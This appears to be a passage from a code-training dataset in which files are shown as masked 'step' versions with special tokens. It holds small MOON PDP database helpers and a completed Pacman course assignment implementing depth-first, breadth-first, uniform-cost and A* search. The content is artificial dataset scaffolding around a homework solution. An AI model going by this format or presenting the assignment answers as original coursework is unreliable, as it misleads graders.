"step-2": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp('', pdp_id)\n",
"step-4": "def update_pdp(pdp_id, value):\n from moon_manager.db_driver import PDPManager\n return PDPManager.update_pdp('', pdp_id, value)\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp('', pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp('', pdp_id)\n",
"step-5": "# Software Name: MOON\n\n# Version: 5.4\n\n# SPDX-FileCopyrightText: Copyright (c) 2018-2020 Orange and its contributors\n# SPDX-License-Identifier: Apache-2.0\n\n# This software is distributed under the 'Apache License 2.0',\n# the text of which is available at 'http://www.apache.org/licenses/LICENSE-2.0.txt'\n# or see the \"LICENSE\" file for more details.\n\n\n\ndef update_pdp(pdp_id, value):\n from moon_manager.db_driver import PDPManager\n return PDPManager.update_pdp(\"\", pdp_id, value)\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp(\"\", pdp_id)\n\n\ndef add_pdp(pdp_id=None, value=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.add_pdp(\"\", pdp_id, value)\n\n\ndef get_pdp(pdp_id=None):\n from moon_manager.db_driver import PDPManager\n return PDPManager.get_pdp(\"\", pdp_id)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
<|reserved_special_token_0|>
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
<|reserved_special_token_0|>
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
<|reserved_special_token_0|>
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Queue()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Stack()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"""*** YOUR CODE HERE ***"""
frontier = util.Queue()
visitedStates = []
frontier.push((problem.getStartState(), []))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"""Search the node of least total cost first. """
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), 0)
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"""*** YOUR CODE HERE ***"""
frontier = util.PriorityQueue()
visitedStates = []
frontier.push((problem.getStartState(), []), heuristic(problem.
getStartState(), problem))
while not frontier.isEmpty():
currentState, pathTaken = frontier.pop()
if currentState in visitedStates:
continue
if problem.isGoalState(currentState):
return pathTaken
visitedStates.append(currentState)
for coordinates, direction, cost in problem.getSuccessors(currentState
):
if coordinates not in visitedStates:
newCost = problem.getCostOfActions(pathTaken + [direction]
) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
<|reserved_special_token_1|>
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
    return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first
Your search algorithm needs to return a list of actions that reaches
the goal. Make sure to implement a graph search algorithm
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print("Start:", problem.getStartState())
print("Is the start a goal?", problem.isGoalState(problem.getStartState()))
print("Start's successors:", problem.getSuccessors(problem.getStartState()))
"""
"*** YOUR CODE HERE ***"
# Frontier stored in a Stack
frontier = util.Stack()
# Visited states stored in a list
visitedStates = []
# Format of each element: (current coordinates, [path taken to get there])
frontier.push((problem.getStartState(), []))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def breadthFirstSearch(problem):
"""
Search the shallowest nodes in the search tree first.
"""
"*** YOUR CODE HERE ***"
# BFS is identical to DFS, save for the data structure used to store the frontier
# Frontier stored in a Queue
frontier = util.Queue()
# Visited states stored in a list
visitedStates = []
# Format of each element: (current coordinates, [path taken to get there])
frontier.push((problem.getStartState(), []))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
frontier.push((coordinates, pathTaken + [direction]))
util.raiseNotDefined()
def uniformCostSearch(problem):
"Search the node of least total cost first. "
"*** YOUR CODE HERE ***"
    # UCS is similar to DFS and BFS, save for a few key differences
# Frontier stored in a Priority Queue
frontier = util.PriorityQueue()
# Visited states stored in a list
visitedStates = []
# Format of each element: ((current coordinates, [path taken to get there]), cost)
frontier.push((problem.getStartState(), []), 0)
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited.
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
# if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier
newCost = problem.getCostOfActions(pathTaken + [direction])
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
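# Illustrative aside (not part of the assignment): with (x, y) coordinate
# states, Manhattan distance is a common admissible heuristic. Sketch,
# assuming the problem exposes its goal coordinates as problem.goal:
#
#     def manhattanHeuristic(state, problem=None):
#         return abs(state[0] - problem.goal[0]) + abs(state[1] - problem.goal[1])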
def aStarSearch(problem, heuristic=nullHeuristic):
"Search the node that has the lowest combined cost and heuristic first."
"*** YOUR CODE HERE ***"
    # A* mirrors UCS, except the heuristic estimate is added to the path cost when ordering the frontier
# Frontier stored in a Priority Queue
frontier = util.PriorityQueue()
# Visited states stored in a list
visitedStates = []
# Format of each element: ((current coordinates, [path taken to get there]), heuristic function)
frontier.push((problem.getStartState(), []), heuristic(problem.getStartState(), problem))
# while there are still states to explore
while not frontier.isEmpty():
# store the current state and path in separate variables
currentState, pathTaken = frontier.pop()
# for skipping states that have already been visited
if currentState in visitedStates:
continue
# for returning the correct path to the goal state upon discovering it
if problem.isGoalState(currentState):
return pathTaken
# count the current state as "visited"
visitedStates.append(currentState)
# for each successor state, check whether they have already been visited.
for coordinates, direction, cost in problem.getSuccessors(currentState):
if coordinates not in visitedStates:
# if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier. Here, unlike UCS, the heuristic function is added to the newCost variable
newCost = problem.getCostOfActions(pathTaken + [direction]) + heuristic(coordinates, problem)
frontier.push((coordinates, pathTaken + [direction]), newCost)
util.raiseNotDefined()
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
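To sanity-check the four searches without the Pacman harness, a minimal sketch; the TinyGraphProblem class and its three-edge graph are illustrative assumptions, and the project's util module must still be importable:

class TinyGraphProblem(SearchProblem):
    """Toy problem: states are labels, every edge costs 1."""

    def __init__(self):
        self.edges = {
            "A": [("B", "A->B", 1), ("C", "A->C", 1)],
            "B": [("G", "B->G", 1)],
            "C": [("G", "C->G", 1)],
            "G": [],
        }

    def getStartState(self):
        return "A"

    def isGoalState(self, state):
        return state == "G"

    def getSuccessors(self, state):
        return self.edges[state]

    def getCostOfActions(self, actions):
        return len(actions)  # unit cost per edge in this toy graph


if __name__ == "__main__":
    problem = TinyGraphProblem()
    print("DFS :", dfs(problem))    # some path to G, e.g. ['A->C', 'C->G']
    print("BFS :", bfs(problem))    # a shortest path, e.g. ['A->B', 'B->G']
    print("UCS :", ucs(problem))
    print("A*  :", astar(problem))  # with nullHeuristic, behaves like UCS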
|
flexible
|
{
"blob_id": "e7b96c0161e65f3f22f2ad0832fc6d1bb529f150",
"index": 9772,
"step-1": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. 
\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n 